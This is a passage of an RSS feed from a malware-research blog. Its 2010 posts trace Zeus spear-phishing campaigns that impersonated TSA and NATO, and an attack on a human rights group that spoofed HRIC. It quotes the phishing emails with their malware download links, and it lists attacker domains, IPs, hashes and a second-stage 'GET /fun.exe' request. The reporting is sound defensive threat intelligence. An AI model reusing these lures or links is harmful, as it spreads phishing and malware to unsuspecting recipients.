Subject: (U) Transportation Security Administration</p>
<p>UNCLASSIFIED//FOR OFFICIAL USE ONLY</p>
<p>(U) Transportation Security Administration</p>
<p>(U) Terrorist Attack Methods in Airport Terminals</p>
<p>A Predictive Analysis for the Detection-Technology Community</p>
<p>15 June 2010</p>
<p>(U//FOUO) This Transportation Security Administration Office of Intelligence (TSA-OI)<br />
assessment, developed at the request of the TSA Office of Security Technology,<br />
examines the terrorist tactics used to attack passengers inside the public areas of an<br />
airport terminal in order to assist in developing security procedures and deploying threat<br />
detection technology to this area. This assessment examined a number of unclassified<br />
sources detailing disrupted plots, bombings, suicide bombers, and armed assaults<br />
conducted in the public areas of airports from the 1960s to the present. Additionally,<br />
attacks on other critical infrastructure targets were reviewed in order to assess which<br />
tactics are more likely to be considered by terrorists targeting airport terminals.</p>
<p>Additional information can be found in the following report:</p>
<p>http://www.christianrantsen.dk/report.zip</p>
<p>http://enigmazones.eu/report.zip</p>
<p>________________________________________<br />
Department of Homeland Security<br />
Office of Infrastructure Protection<br />
Infrastructure Security Compliance Division<br />
Mail Stop 8100<br />
Washington, DC 20528
</p></blockquote>
<p>* A variety of these emails are also available at: http://www.sophos.com/blogs/sophoslabs/?p=10116</p>
<p><strong>August 26, 2010</strong><br />
Source: http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html</p>
<blockquote><p>
From: ifc@ifc.nato.int<br />
Date: Thu, 26 Aug 2010 08:24:30 -0500<br />
Subject: From Intelligence Fusion Centre</p>
<p>Intelligence Fusion Centre<br />
In support of NATO<br />
RAF Molesworth, United Kingdom<br />
Unit 8845 Box 300, Huntingdon<br />
CAMBS PE28 0QB</p>
<p>    FROM: Intelligence Fusion Centre<br />
    SUBJECT: Military operation of the EU</p>
<p>    Additional information can be found in the following report:</p>
<p>    http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip<br />
    http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN.ip</p>
<p>    > EUROPEAN UNION<br />
    > EUROPEAN SECURITY AND DEFENCE POLICY<br />
    > Military operation of the EU<br />
    > EU NAVFOR Somalia<br />
    ><br />
    > This military operation, called EU NAVFOR Somalia &#8211; operation<br />
    > &#8220;Atalanta&#8221;, is launched in support of Resolutions 1814 (2008), 1816<br />
    > (2008), 1838 (2008) and 1846 (2008) of the United Nations Security Council (UNSC) in order to contribute to:<br />
    > &#8211;  the protection of vessels of the WFP (World Food Programme) delivering food aid to displaced<br />
    >    persons in Somalia;<br />
    > &#8211;  the protection of vulnerable vessels cruising off the Somali coast, and the deterrence, prevention<br />
    >    and repression of acts of piracy and armed robbery off the Somali coast.<br />
    > This operation, which is the first EU maritime operation, is conducted<br />
    > in the framework of the European Security and Defence Policy (ESDP).<br />
    ><br />
    ><br />
    > More information and background documents available on<br />
    > http:// gnarus.mobi/media/EuropeanUnion_MilitaryOperations_EN. zip<br />
    > and<br />
    > http:// quimeras.com.mx/media/EuropeanUnion_MilitaryOperations_EN. zip<br />
    ><br />
    > ________________________________________<br />
    > PRESS &#8211; EU Council Secretariat Tel: +32 (0)2 281 7640 / 6319
</p></blockquote>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/09/crime-or-espionage-part-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Crime or Espionage?</title>
		<link>http://cyber.secdev.ca/2010/08/crime-or-espionage/</link>
		<comments>http://cyber.secdev.ca/2010/08/crime-or-espionage/#comments</comments>
		<pubDate>Sat, 28 Aug 2010 12:27:23 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[zeus]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=258</guid>
		<description><![CDATA[ZeuS is a well known crimeware tool kit that is readily available online. The tool allows even the most unskilled to operate a botnet. Typically, Zeus has been associated with banking fraud. Recently, there have been a series of attacks using the Zeus malware that appear to be less motivated by bank fraud and more [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://us.trendmicro.com/imperia/md/content/us/trendwatch/researchandanalysis/zeusapersistentcriminalenterprise.pdf">ZeuS</a> is a well known crimeware tool kit that is readily available online. The tool allows even the most unskilled to operate a botnet. Typically, Zeus has been associated with banking fraud. Recently, there have been a series of attacks using the Zeus malware that appear to be less motivated by bank fraud and more focused on acquiring data from compromised computers. The themes in the emails &#8212; often sent out to .mil and .gov email addresses &#8212; focus on intelligence and government issues. After the user receives such an email, and downloads the file referenced in the email, his or her computer will likely (due to the low AV coverage) become compromised by the ZeuS malware used by the attackers and will begin communicating with a command and control server. It will then download an additional piece of malware, an &#8220;infostealer&#8221;, which will begin uploading documents from the compromised computer to a drop zone under the control of the attackers. Are these series of attacks connected? Are these events indicating a blurring of the boundaries between online crime and espionage? Or are government and military personnel just another <a href="http://blog.trendmicro.com/zeus-variant-targets-us-military-personnel/">target</a> for online criminal activity?</p>
<p>This post was inspired by a recent <a href="http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html">post </a> at contagio.blogspot.com. What appears to be a one-off attack using Zeus, I believe, is actually another round of a series of Zeus attacks. These attacks appear to be aimed at those interested in intelligence issues and those in the government and military, although the targeting appears to be general rather than targeted.</p>
<p><strong>Round 1</strong></p>
<p>On February 6th, 2010, Brian Krebs <a href="http://krebsonsecurity.com/2010/02/zeus-attack-spoofs-nsa-targets-gov-and-mil/">reported</a> that attackers using the Zeus trojan targeted a variety of .gov and .mil email addresses in a spear phishing attack that appeared to be from the National Security Agency and enticed users to download a report called the &#8220;2020 Project.&#8221; The command and control server used in the attacks was updatekernel.com.</p>
<p><strong>Round 2</strong></p>
<p>Following the publication of the article by Brian Krebs, attackers took portions of his article and used them as <a href="http://www.krebsonsecurity.com/2010/02/warning-about-zeus-attack-used-as-lure/">lure</a> in further spear phishing attacks. Sophos Labs <a href="http://www.sophos.com/blogs/sophoslabs/?p=8654">analyzed</a> the sample that used Kreb’s post. A post on Intelfusion.com by Jeff Carr regarding the spear phishing attack was also used in another attack. I documented these attacks in &#8220;<a href="http://www.nartv.org/2010/03/01/the-kneber-botnet-spear-phishing-attacks-and-crimeware/">The &#8216;Kneber&#8217; Botnet, Spear Phishing Attacks and Crimeware</a>&#8220;. The key command and control server in this case was also updatekernel.com.</p>
<p><strong>Round 3</strong></p>
<p>In early March 2010, more emails began <a href="http://cafe.comebackalive.com/viewtopic.php?f=1&#038;t=48810">circulating</a>, one of which encouraged users to download malware from dhsorg.org (222.122.60.186). This malware used greylogic.org (222.122.60.186) as a command and control server. In addition to sharing an IP address, both domain were registered by hilarykneber@yahoo.com. The attack continued using the domain names dhsinfo.info, greylogic.info, and intelfusion.info (abuseemaildhcp@gmail.com) which were hosted on 218.240.28.34. The domain names used in these attacks were variations of domain names owned by Jeff Carr who has aptly characterized these attacks as a &#8220;<a href="http://blogs.forbes.com/firewall/2010/03/18/zeus-criminals-run-a-poisoning-the-well-attack-against-intelfusion-and-greylogic/">Poisoning The Well</a>&#8221; attack. </p>
<p><strong>Round 4</strong></p>
<p>In June 2010 another <a href="http://www.clearancejobs.com/security_tips.php">campaign</a> began. The lure of the attack emphasizes Jeff Carr&#8217;s book &#8220;Inside Cyber Warfare: Mapping the Cyber Underworld&#8221; with the text copied from http://www.stratcom.mil/reading_list/. The command and control server in this case was from-us-with-love.com.</p>
<p><strong>Round 5</strong></p>
<p>Mila Parkour recently <a href="http://contagiodump.blogspot.com/2010/08/cve-2010-1240-with-zeus-trojan.html">posted</a> details of an interesting attack on contagiodump.blogspot.com. The email used in the attack appeared to be from &#8220;ifc@ifc.nato.int&#8221; with the subject &#8220;Intelligence Fusion Centre&#8221; and contained links to a report <a href="http://www.virustotal.com/file-scan/report.html?id=5761e303d7bc027df47b5b01a3e4e8e186eb36d3a4f40956768231ef3bbcac46-1282832496">EuropeanUnion_MilitaryOperations_EN.pdf</a> that exploits <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1240">CVE-2010-1240</a> in order to drop a <a href="http://www.virustotal.com/file-scan/report.html?id=33ac66e78d410d03f5644fb1569ea7d28e823561e00b86593d9022f554127c7e-1282847843">ZeuS binary</a>. </p>
<blockquote><p>
File name: EuropeanUnion_MilitaryOperations_EN.pdf<br />
MD5: 8b3a3c4386e4d59c6665762f53e6ec8e<br />
VT: 11/41 (26.8%)</p>
<p>File name: exe.exe<br />
MD5: 5fb94eef8bd57fe8e20ccc56e33570c5<br />
VT: 3/41 (7.3%)</p>
<p>File name: ntos.exe<br />
MD5: 28c4648f05f46a3ec37d664cee0d84a8<br />
VT: 4/39 (10.3%)
</p></blockquote>
<p>First, the ZeuS malware connects to <strong>from-us-with-love.info</strong> (91.216.141.171) to receive the Zeus config file. Second, the malware connects to <strong>vittles.mobi</strong> (174.132.255.10) to download an <a href="http://www.virustotal.com/file-scan/report.html?id=430e40b9cf16e9f54526293e8a0ce93c7ba44065f4702f9252c919bb3104de03-1282920326">infostealer</a>. Finally, the infostealer connects to <strong>nicupdate.com</strong> (85.31.97.194). </p>
<blockquote><p>
logic.exe<br />
MD5: 4f47b495caae1db79987b34afc971eaa<br />
VT: 3/ 42 (7.1%)
</p></blockquote>
<p>The domain name from-us-with-love.info was registered by &#8220;Maria Laguer&#8221; with the email address admin@from-us-with-love.info, which was also used to register <strong>from-us-with-love.com</strong> (the name is also associated with other ZeuS domain, see <a href="http://www.malwaredomainlist.com/mdl.php?search=Maria+Laguer&#038;colsearch=All&#038;quantity=50&#038;inactive=on">MDL</a>). The decrypted ZeuS config file from from-us-with-love.info contains two additional domain names: enigmazones.eu and askkairatik.net. The domain names were used as part of a previous ZeuS campaign that used from-us-with-love.com as a command and control server. IN addition the location of the malware, quimeras.com.mx, was also used in a previous campaign that had from-us-with-love.com as the command and control server.</p>
<p>One of the email addresses (www-data@nighthunter.ath.cx) that was used to propagate the malware associated with enigmazones.eu also <a href="http://cafe.comebackalive.com/viewtopic.php?f=1&#038;t=48810">delivered</a> the emails containing malware hosted on dhsorg.org, which was registered by the infamous hilarykneber@yahoo.com and used in <a href="http://blogs.forbes.com/firewall/2010/03/18/zeus-criminals-run-a-poisoning-the-well-attack-against-intelfusion-and-greylogic/">attacks</a> in May. The domain dhsorg.org was hosted on 222.122.60.186 along with greylogic.org which was used as a command and control server.</p>
<p>The boundaries between the online crime and espionage appear to be blurring making issues of attribution increasingly more complex. Are online criminals simply targeting those interested in intelligence issues as well as members of the government and military for fraud? Have they determined that they can exploit such persons for fraud in addition to selling and sensitive data acquired to those who would be in the market for such information? Or is the campaign more specifically oriented toward espionage using ZeuS and the malware ecosystem as convenient cover? While these questions are unlikely to be ever definitively answered, we can begin to assess qualitative changes in attacks by tracking them overtime and carefully linking together seemingly disparate peices of data. This post was made possible by a wide variety of sources that each posted components of these attacks. While there is a need to protect certain sources as well as operation security so that the &#8220;bad guys&#8221; are not tipped off and continued research into their malicious activities remains possible, information sharing remains a key component malware research. </p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/08/crime-or-espionage/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Human Rights and Malware Attacks</title>
		<link>http://cyber.secdev.ca/2010/08/human-rights-and-malware-attacks/</link>
		<comments>http://cyber.secdev.ca/2010/08/human-rights-and-malware-attacks/#comments</comments>
		<pubDate>Thu, 19 Aug 2010 12:25:21 +0000</pubDate>
		<dc:creator>nart</dc:creator>
				<category><![CDATA[SecDev.cyber Blog]]></category>
		<category><![CDATA[Malware]]></category>

		<guid isPermaLink="false">http://cyber.secdev.ca/?p=256</guid>
		<description><![CDATA[Human Rights and Malware Attacks by Nart Villeneuve On March 18, 2010, unknown attackers sent a spear phishing email that appeared to be from Sharon Hom, the Executive Director of Human Rights in China (HRIC), to a variety of organizations and individuals. Leveraging the trust and recognition of HRIC, the attackers&#8217; email encouraged recipients to [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Human Rights and Malware Attacks</strong></p>
<p>by Nart Villeneuve</p>
<p>On March 18, 2010, unknown attackers sent a spear phishing email that appeared to be from Sharon Hom, the Executive Director of Human Rights in China (HRIC), to a variety of organizations and  individuals. Leveraging the trust and recognition of HRIC, the  attackers&rsquo; email encouraged recipients to visit a  compromised website that contained malicious code designed  to allow the attackers to ultimately take full  control of the visitor&rsquo;s computer. These targeted malware attacks  are now becoming commonplace, further extending  the threat faced by civil society organizations.</p>
<hr />
<strong>UPDATE</strong></p>
<p>One of the domains used in this attack, humanright-watch.org, has been used in a variety of attacks and has been documented by Mila at <a href="http://contagiodump.blogspot.com/">contagiodump.blogspot.com</a>.</p>
<ul>
<li><a href="http://contagiodump.blogspot.com/2009/12/dec26-cve-2009-4324-adobe-0-day.html">Dec.26 CVE-2009-4324 Adobe 0 Day Christmas Greetings from H.H. the Dalai Lama from test01@humanright-watch.org Sat, 26 Dec 2009 20:58:47 +0800</a></li>
<li><a href="http://contagiodump.blogspot.com/2010/06/may-28-cve-2009-3129-xls-for-office.html">May 28 CVE-2009-3129 XLS for office 2002-2007 with fud keylogger EIDHR from david@humanright-watch.org</a></li>
</ul>
<hr />
<p><strong>Introduction</strong></p>
<p>Internet censorship is but one component  of &ldquo;a matrix of control&rdquo; that acts to restrict and  control information flow in China. The combination of  censorship along with surveillance aims to influence  behavior toward self-censorship so that most will not actively seek out banned information, let alone the means  to bypass these controls. Those engaged in political  activities and those who vocally oppose repressive policies  such as censorship may be subjected to a complex set of  threats&mdash;not simply censorship.</p>
<p>A 2008 report titled <em><a href="http://www.nartv.org/mirror/breachingtrust.pdf" target="_blank">Breaching Trust:  An Analysis of Surveillance and Security Practices on China&rsquo;s  TOM-Skype Platform</a></em> uncovered that Skype and its  Chinese partner Tom Online operated a surveillance  network which insecurely captured millions of records including  contact details for any text chat and/or voice  calls and the full text of sensitive chat messages. A large  portion of these captured messages concerned a political campaign  that urged Chinese citizens to quit the Communist  Party.</p>
<p>There have been an increasing number of  targeted malware attacks against civil society  organizations, human rights groups, media organizations, and  Tibetan supporters. Typically, the targeted user receives an  email, possibly appearing to be from someone they know who is a real person within his or her organization, with some text&mdash;sometimes specific, sometimes generic&mdash;that urges the user to open an attachment (or visit a web  site), usually a PDF or Microsoft Office document .</p>
<p>If the user opens the attachment with a  vulnerable version of Adobe Reader or Microsoft Office  (other types of software are also being exploited) and no other  mitigations are in place, their computer will likely  be compromised. A clean version of the document is  typically embedded in the malicious file and is opened upon  successful exploitation so as not to arouse suspicion of the  recipient.</p>
<p>Then the user&rsquo;s computer checks in with  a command and control server. At this point, the  attacker has full control of the user&rsquo;s system. The  attacker can steal documents, email and send other data, or force the  compromised computer to download additional malware  and possibly use the infected computer as a  mechanism to exploit the victim&rsquo;s contacts or other  computers on the target network.</p>
<p>In the last year, the Information  Warfare Monitor has uncovered two cyber-espionage networks,  investigated numerous targeted malware attacks, and  published two reports: <em><a href="http://www.nartv.org/mirror/ghostnet.pdf">Tracking  GhostNet: Investigating a Cyber Espionage Network</a></em> and <em><a href="http://www.nartv.org/mirror/shadows-in-the-cloud.pdf">Shadows  in the Cloud: An Investigation into Cyber Espionage 2.0</a></em>.</p>
<p>The first, GhostNet<em>, </em>was a network of over  1200 compromised computers spread across 103 countries,  30 percent of which we identified and  determined to be &ldquo;high-value&rdquo; targets, including  ministries of foreign affairs, embassies, international  organizations, news organizations, and a computer located at  NATO headquarters. While we were able to determine that  these entities had been compromised, we were  only able to theorize about what type of data the  attackers were able to acquire.</p>
<p>Our follow-up investigation uncovered  the <a href="http://www.nartv.org/mirror/shadows-in-the-cloud.pdf">Shadow Network</a>, and unlike GhostNet we were able  to acquire the data stolen by the attackers. We  were able to access just one portion of the Shadow Network  that was primarily focused on extracting sensitive  information from India. We recovered a wide variety  of documents, including one document that appeared to  be encrypted diplomatic correspondence, two documents  marked &ldquo;SECRET,&rdquo; six as &ldquo;RESTRICTED,&rdquo; and five  as &ldquo;CONFIDENTIAL&rdquo; which appear to belong to Indian  government entities including the National Security  Council Secretariat (NSCS) of India, the Embassy  of India, Kabul, the Embassy of India, Moscow, the  Consulate General of India, Dubai, and the High  Commission of India in Abuja, Nigeria. We also  recovered documents including 1,500 letters sent from the  Dalai Lama&rsquo;s office between January and November 2009.</p>
<p>The nature of the compromised entities  and the data stolen by the attackers do indicate  correlations with the strategic interests of the People&rsquo;s  Republic of China, but, we were unable to determine any direct  connection between these attackers and elements of  the Chinese state.</p>
<p><strong>Investigation</strong></p>
<p><strong>Summary</strong></p>
<p>On March 18, 2010, attackers sent a &ldquo;spear  phishing&rdquo; email that appeared to originate from  Sharon Hom&rsquo;s email account to several different  organizations and individuals. The subject of the email  was &ldquo;Microsoft, Stool Pigeon for the Cops and FBI&rdquo; and  the email contained a JPG attachment. However, the attackers&rsquo;  objective was for the targets to visit the link  contained in the email. The link, www.cfcr2008.org,  redirected to cfcr.i1024.com which was compromised by  the attackers and in which they had inserted code that  caused visitors to the website to open a malicious PDF  from www.520520.com.tw. This PDF exploited  Adobe Reader and compromised the visitors computer.  Compromised computers then connected to a website  under the attackers&rsquo; control,  www.humanright-watch.org, and downloaded additional malware before  ultimately connecting to a command and control server,  360liveupdate. com, in China.</p>
<p><strong>Spoofed Email</strong></p>
<div style="background-color: #cccccc; width: 50%; margin: 0px auto -1px auto; padding: 5px;"><strong>From</strong>: Sharon Hom &lt;mailto:sharonhom@hrichina.org&gt;   <strong><br /> To</strong>: [REDACTED]   <br /> <strong>Sent</strong>: Thursday, March 18, 2010 9:46 AM   <strong><br /> Subject</strong>: Microsoft, Stool Pigeon for the Cops and FBI</p>
<p>&nbsp;</p>
<p>I&rsquo;ve got my  hands on a copy of the leaked, confidential Microsoft &ldquo;Global Criminal Compliance  Handbook,&rdquo; which details for police and intelligence services exactly what information  Microsoft collects about users of its online services, and how they can be accessed.  What is gathered and available about you is quite comprehensive, including your  emails, detailed information about when you sign in and use the services,  credit card information, and so on. Attachments are scanned copies of  documents.</p>
<p>For the whole  documents, please visit http://www.cfcr2008.org</p>
</div>
<p><strong>Email Headers</strong></p>
<p>Although the email appeared to be from  HRIC it was actually sent from the following  location:</p>
<div style="background-color: #cccccc; width: 50%; margin: 0px auto -1px auto; padding: 5px;"><strong>Sender</strong>: selina@avghost.net &lt;mailto:selina@avghost.net&gt;   <strong><br /> Received</strong>: from mail.idcsea.com.cn (mail.idcsea.com.cn [208.77.45.130])   <br /> <strong>X-mailer</strong>: Foxmail 5.0 [cn]</p>
<p>&nbsp;</p>
</div>
<p>The email headers reveal that the  attackers actually sent the email from the following IP address:</p>
<div style="background-color: #cccccc; width: 50%; margin: 0px auto -1px auto; padding: 5px;"><strong>208.77.45.130</strong> <br /> <strong>OrgName</strong>: DCS Pacific Star, LLC   <br /> <strong>OrgID</strong>: DCSPA   <strong><br /> Address</strong>: 5050 El Camino Real, #238   <br /> <strong>City</strong>: Los Altos   <br /> <strong>StateProv</strong>: CA   <strong><br /> PostalCode</strong>: 94022   <br /> <strong>Country</strong>: US</div>
<p>The email encouraged recipients to visit <strong>cfcr2008.org</strong>,  the website of an organization called the Coalition for Citizen&rsquo;s Rights. This  organization is a vocal opponent of the Chinese government.</p>
<p>The attackers compromised the website and  inserted malicious code that caused vulnerable visitors to silently load a  malicious PDF document that infected the users computer with malware.</p>
<p align="center"><strong>Image 1 Compromised site: cfcr2008.org -&gt; cfcr.i1024.com</strong></p>
<p align="center"><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/08/15-Malware-01.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/08/15-Malware-01t.png" border="1" alt="" width="550" height="323" /></a></p>
<p align="center"><strong>Image 2 js_men.asp</strong></p>
<p align="center"><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/08/15-Malware-02.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/08/15-Malware-02t.png" border="1" alt="" width="525" height="308" /></a></p>
<p>The malicious PDF was hosted on <strong>www.520520.com.tw </strong>(203.69.42.41), a website located in Taiwan. This  malicious file has very low antivirus coverage. Only eight out of forty-two  anti-virus products detected the file as malware.</p>
<p><strong>Item 3</strong></p>
<table border="1" align="center">
<tbody>
<tr>
<td>
<table border="1" align="center">
<tbody>
<tr>
<td>Filename</td>
<td>readme.pdf</td>
</tr>
<tr>
<td>Filetype</td>
<td>PDF</td>
</tr>
<tr>
<td>CVE</td>
<td>?</td>
</tr>
<tr>
<td>MD5</td>
<td>72bdca7dd12ed04b21dfa60c5c2ab6c4</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<p>Virustotal: 8/42 (19.05%)<br /> http://www.virustotal.com/analisis/dbfded7c7401b8128f39f8e8834bafe7a11addfa9b4c5a1bb9247243a443a4b1-1269343609</p>
<p>http://wepawet.cs.ucsb.edu/view.php?hash=f2275da93b6f708e80a84176f64d7dfe&amp;t=1269304734&amp;type=js</p>
</td>
</tr>
</tbody>
</table>
<p>The malware dropped by the malicious PDF  issued another connection, this time to <strong>www.humanright-watch.org</strong> (204.16.193.39).  This is a server under the control of the attackers. The malware made a request  for another executable, which appeared to be encrypted and which no antivirus  products detected as malicious.</p>
<p><strong>Item 4</strong></p>
<table border="1" align="center">
<tbody>
<tr>
<td>
<p>GET /fun.exe HTTP/1.1<br /> Host: www.humanright-watch.org</p>
</td>
</tr>
<tr>
<td>
<table border="1" align="center">
<tbody>
<tr>
<td>Filename</td>
<td>fun.exe</td>
</tr>
<tr>
<td>Filetype</td>
<td>EXE</td>
</tr>
<tr>
<td>CVE</td>
<td>?</td>
</tr>
<tr>
<td>MD5</td>
<td>ec16143a14c091100e7af30de03fce1f</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<p>Virustotal: 0/42 (0%)<br />http://www.virustotal.com/analisis/8cc9dc5d07b4a9b4dca13923779a16a17e772dfbb2b7d2aa0425b5f8e03b2f1f-1269343660</p>
</td>
</tr>
</tbody>
</table>
<p>Interestingly, the IP address of <strong>www.humanright-watch.org </strong>(204.16.193.39) is assigned to the same  company, DCS Pacific Star, LLC, as the IP address used to send the malicious  email (208.77.45.130).</p>
<p>The new malware downloaded from <strong>www.humanright-watch.org </strong>(204.16.193.39) began encrypted  communications with a command and control server located in China at 3<strong>60liveupdate.com</strong>(117.85.48.157).</p>
<p align="center"><strong>Image 5</strong></p>
<p align="center"><a href="http://www.infowar-monitor.net/wp-content/uploads/2010/08/15-Malware-05.png"><img src="http://www.infowar-monitor.net/wp-content/uploads/2010/08/15-Malware-05t.png" border="1" alt="" width="525" height="170" /></a></p>
<p>The command and control server is  located in Jiangsu Province, China:</p>
<div style="background-color: #cccccc; width: 50%; margin: 0px auto -1px auto; padding: 5px;"><strong>117.85.48.157</strong> <strong><br /> inetnum</strong>: 117.80.0.0 &#8211; 117.95.255.255   <strong><br /> netname</strong>: CHINANET-JS   <br /> <strong>descr</strong>: CHINANET jiangsu province network   <br /> <strong>descr</strong>: China Telecom   <br /> <strong>descr</strong>: A12,Xin-Jie-Kou-Wai Street   <strong><br /> descr</strong>: Beijing 100088   <strong><br /> country</strong>: CN</div>
<p><strong>Conclusion</strong></p>
<p>The nexus of censorship, surveillance,  and malware attacks enable strict information control policies in China that extend beyond China&rsquo;s boundaries to  affect civil society organizations around the world. An increasing number of targeted malware attacks against civil  society organizations are being reported. In many cases, the attacks can be traced back to command and control  infrastructure located in China. These attacks leverage trust among members of social and political networks using  human rights themes and spoofed identities to encourage targeted users to  execute malicious code. From that point, unknown  attackers have full control over the users&rsquo; computers and can conduct  surveillance, exfiltrate sensitive information, and  use the computer as a staging ground for future attacks.</p>
</p>
<hr />
<p>The original version of this article is available <a href="http://www.hrichina.org/public/contents/article?revision_id=175265&#038;item_id=175263">here</a> and in Chinese <a href="http://gb.hrichina.org/public/contents/19653">here</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://cyber.secdev.ca/2010/08/human-rights-and-malware-attacks/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>

